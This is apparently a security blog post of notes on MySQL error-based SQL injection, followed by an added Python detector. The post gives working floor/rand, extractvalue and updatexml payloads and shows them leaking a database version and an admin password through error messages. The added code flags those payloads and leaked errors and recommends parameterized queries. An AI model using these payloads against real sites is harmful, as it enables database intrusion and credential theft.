Posting some of my old notes. When MySQL executes a statement it throws error messages, and sites built on PHP+MySQL often print that error text straight onto the page, so the following three methods can be used to extract specific data through the error message.
Test environment:
mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+
mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+
mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor()
The following payloads can be used:
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:
First, a normal query:
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error:
mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
As you can see, the MySQL version was leaked through the error message. To retrieve other data, replace the version() expression with a different subquery.
For example, to retrieve the administrator's username and password:
Method 1:
mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method 2:
mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue
Test statement:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
Actual test:
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test statement:
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
Actual test:
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
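All three methods above depend on the same two things: a request that carries one of the error-forcing expressions (floor(rand(0)*2) with GROUP BY, extractvalue(), updatexml()), and an application that echoes the raw MySQL error back to the client. As an added example, not code from the original post, here is a small Python detector that covers both sides for the three methods: it flags request query strings containing any of the three primitives (after URL decoding, so double-encoded and mixed-case variants are still caught) and flags response bodies that contain the ERROR 1062 "group_key" or "XPATH syntax error" text shown above. The signature names, the sample query strings and the sample response bodies are all constructed for this example.

```python
"""Added example: detect MySQL error-based injection attempts (floor/rand,
extractvalue, updatexml) in request query strings, and detect MySQL error
text leaking into HTTP response bodies. All sample data below is constructed."""
import re
from urllib.parse import unquote_plus

# Request-side signatures for the three primitives discussed above.
# Keys are names chosen for this example, not a standard taxonomy.
REQUEST_SIGNATURES = {
    "floor_rand_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
}

# Response-side signatures: the exact error formats the post shows being echoed.
RESPONSE_SIGNATURES = {
    "duplicate_group_key": re.compile(
        r"ERROR 1062 \(23000\): Duplicate entry '.*' for key 'group_key'"),
    "xpath_syntax_error": re.compile(r"XPATH syntax error: '.*'"),
}


def normalize(value: str) -> str:
    """URL-decode twice (to defeat double encoding) and collapse whitespace."""
    decoded = unquote_plus(unquote_plus(value))
    return re.sub(r"\s+", " ", decoded)


def classify_request(query_string: str) -> list:
    """Return the names of every request signature that matches."""
    text = normalize(query_string)
    return [name for name, rx in REQUEST_SIGNATURES.items() if rx.search(text)]


def classify_response(body: str) -> list:
    """Return the names of every leaked-error signature found in a response."""
    return [name for name, rx in RESPONSE_SIGNATURES.items() if rx.search(body)]


def find_attempts(query_strings) -> list:
    """Return (index, matched_signatures) for each flagged query string."""
    hits = []
    for i, qs in enumerate(query_strings):
        tags = classify_request(qs)
        if tags:
            hits.append((i, tags))
    return hits


# Constructed sample query strings: one benign, then the post's three payloads
# as they would appear URL-encoded, and one double-encoded, mixed-case variant.
SAMPLE_REQUESTS = [
    "id=1",
    "id=1+and+(select+1+from+(select+count(*),concat(version(),"
    "floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)",
    "id=1%20and%20extractvalue(1,concat(0x5c,"
    "(select%20pass%20from%20admin%20limit%201)))",
    "id=1%20and%201%3D(updatexml(1,concat(0x5e24,(select%20user()),0x5e24),1))",
    "id=1%2520and%2520UPDATEXML(1,1,1)",
]

# Constructed sample response bodies: one normal page, two with leaked errors
# in the formats shown in the post.
SAMPLE_RESPONSES = [
    "<html><body>test do it</body></html>",
    "ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'",
    "ERROR 1105 (HY000): XPATH syntax error: '\\admin888'",
]

if __name__ == "__main__":
    for idx, tags in find_attempts(SAMPLE_REQUESTS):
        print(f"request {idx}: suspected error-based injection {tags}")
    for idx, body in enumerate(SAMPLE_RESPONSES):
        leaked = classify_response(body)
        if leaked:
            print(f"response {idx}: database error leaked to client {leaked}")
```

The response-side check is the more useful of the two for a defender, because it tells you whether the precondition for all three methods (raw MySQL errors reaching the client) actually holds on a given application; the request-side signatures are a backstop for log review, since the real fix is parameterized queries for the id parameter and returning a generic error page instead of the database message.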
That's all; thanks to the foreign guys.